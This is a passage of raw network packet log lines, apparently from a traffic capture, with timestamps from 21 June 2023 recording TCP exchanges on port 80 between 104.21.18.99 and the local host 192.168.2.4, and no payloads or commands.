                                                                                                  Jun 21, 2023 20:23:43.163300991 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.163326979 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.163357019 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.164078951 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.164108038 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.164122105 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.164135933 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.164163113 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.164166927 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.164189100 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.164215088 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.164246082 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.164982080 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.165009022 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.165021896 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.165035963 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.165064096 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.165069103 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.165090084 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.165117025 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.165119886 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.165848017 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.165874958 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.165884972 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.165904045 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.165931940 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.165937901 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.165980101 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.166007042 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.166011095 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.166712046 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.166739941 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.166750908 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.166769028 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.166794062 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.166800022 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.166821003 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.166846991 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.166855097 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.167599916 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.167627096 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.167650938 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.167656898 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.167680025 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.167705059 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.167710066 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.167732000 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.167771101 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.168493032 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.168520927 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.168545961 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.168572903 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.168580055 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.168598890 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.168600082 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.168627024 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.168628931 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.169367075 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.169394016 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.169401884 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.169420004 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.169445992 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.169446945 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.169497013 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.169517994 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.169528008 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.177094936 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.188553095 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.188589096 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.188612938 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.188641071 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.188668966 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.188694954 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.188786983 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.188786983 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189182997 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189218998 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189244032 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189265966 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189291000 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189316034 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189325094 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189342022 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189383030 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189383030 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189388037 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189425945 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189452887 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189471960 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189493895 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189522982 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189549923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189558983 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189575911 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189601898 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189618111 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189627886 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189636946 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189656019 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189683914 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189699888 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189708948 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189737082 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189752102 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189763069 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189790964 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189812899 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189830065 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189840078 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189848900 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189867020 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189893007 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189903975 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189923048 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189948082 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.189956903 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.189975023 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190001011 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190011024 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190026045 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190051079 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190078974 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190104961 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190130949 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190136909 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190156937 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190164089 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190184116 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190211058 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190220118 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190237045 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190263033 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190274000 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190433979 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190499067 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190526962 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190552950 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190581083 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190597057 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190607071 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190634012 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190649986 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190660954 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190687895 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190696001 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190713882 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190742016 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190768003 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190782070 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190794945 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190805912 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190821886 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190849066 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190875053 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190888882 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190901995 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190906048 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.190928936 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190957069 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.190964937 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.191082954 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.191454887 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191483021 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191508055 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191534042 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191549063 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.191559076 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191586971 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191603899 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.191615105 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191641092 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191667080 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191674948 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.191696882 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191708088 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.191726923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191755056 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191766024 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.191781998 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191807985 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191816092 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.191833973 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191859961 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191873074 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.191900015 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191926003 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.191930056 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.192015886 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.192444086 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192471027 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192497969 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192524910 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192552090 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192572117 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.192579985 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192589998 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.192609072 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192636967 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192646027 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.192667961 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192693949 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192708015 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.192720890 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192749023 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192768097 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.192776918 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192805052 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192826986 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.192832947 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192861080 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192882061 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.192888021 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192917109 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.192922115 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.193203926 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.193334103 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193362951 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193389893 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193417072 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193443060 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193449974 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.193470955 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193478107 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.193499088 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193526030 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193533897 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.193555117 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193579912 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193607092 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193634033 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193645954 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.193660975 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193686962 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193698883 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.193713903 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193741083 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193749905 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.193767071 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193793058 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.193799019 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.193928003 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.194281101 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194312096 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194336891 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194363117 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194391012 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194407940 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.194417000 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194446087 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194470882 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194498062 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194521904 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194541931 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.194550037 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194576979 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194602966 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194602966 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.194602966 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.194629908 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194658041 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194672108 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.194684029 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194700003 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.194715023 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194741964 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.194756031 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.195225954 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195255041 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195295095 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195322037 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195347071 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195353985 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.195353985 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.195374966 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195379972 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.195401907 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195427895 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195436001 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.195455074 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195481062 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195487976 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.195508957 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195535898 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195544004 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.195561886 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195589066 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195600986 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.195710897 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.195930004 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195960045 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.195997000 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196024895 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196037054 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.196053028 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196084023 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196100950 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.196110010 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196139097 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196156025 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.196166039 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196194887 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196204901 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.196225882 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196252108 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196259022 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.196293116 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196319103 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196342945 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.196346045 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196374893 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.196384907 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.196403027 CEST8049697104.21.18.99192.168.2.4
